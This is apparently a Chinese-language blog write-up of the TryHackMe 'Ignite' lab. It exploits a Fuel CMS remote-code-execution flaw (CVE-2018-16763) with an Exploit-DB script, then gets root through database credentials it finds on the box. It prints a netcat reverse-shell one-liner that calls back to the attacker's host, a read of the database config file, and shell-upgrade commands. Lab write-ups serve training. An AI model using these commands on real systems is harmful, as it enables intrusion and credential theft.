[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用

前言

房间地址:https://tryhackme.com/room/ignite

一家新成立的公司的网络服务器存在一些问题。

图片[1],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[2],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

此次我将用Parror hack系统作为攻击机器

实战

靶机地址:10.10.178.214

先给咱的系统升一下root

图片[3],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

吐槽一下Thm的VPN 有点拉胯

图片[4],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

说明咱们连接不上他们的内网VPN

后来修了修,连上了好了我们开扫

图片[5],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

开放了80端口

图片[6],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[7],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

查看源代码

图片[8],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

先登录上再说

图片[9],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[10],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

可以看见直接文件上传漏洞 在上传之前我们先搜索一下Fuel CMS的漏洞

刚用Parror没有搜到Fuel CMS的漏洞 就用kali搜

图片[11],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

漏洞其实还不少… 不过在此使用他们的漏洞我觉得不如自己上传shell

图片[12],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[13],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

这里看到我们准备的shell 是不行的 所以我们只能用漏洞库的脚本shell了

图片[14],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

这里看看他们的用法

图片[15],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

在这里试一下 不过我们还是去kali或者parror那里去运行脚本

这里我更换了一个靶机地址:因为老是断 服了

我一怒之下给我的kali和parror都上了”魔法”

图片[16],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[17],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

我们继续:分析一下脚本的使用方法

图片[18],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

使用脚本:

python3 50477.py -u http://10.10.234.58

开启监听:

nc -nlvp 6666

反弹shell:

nc后面是自己的攻击地址

rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.92.117 6666 >/tmp/f
图片[19],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

不好意思这Thm靶场老断打一次靶场能断十几次 昨天因为这个老断我就没打,等我订阅结束之后就不打Thm打HTB了

先拿一个flag再说

图片[20],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

刚才连接又断了

不过再次连接上我们在看一下根目录

图片[21],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

根据开头的提示

图片[22],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

database中数据库泄露 当然这也是CVE-2018-16763的一个漏洞

没有对用户的查看权限进行过滤 这时候我们就可以查看他数据库

cat /var/www/html/fuel/application/config/database.php
图片[23],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

我们su root切换到root账户提示

图片[24],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

必须来自一个终端环境

那我们就创建,这个在我之前博客里面有讲解,加固shell创建终端环境

export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z 
stty raw -echo ; fg
 reset 
图片[25],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

回车 输入刚才数据库泄露的密码

图片[26],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

OK让拿root.txt

图片[27],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网
图片[28],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网

等订阅过期就打HTB了 本来能秒的 VPN一直断打不了一点,上代理都掉,这次大概断了十几次

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容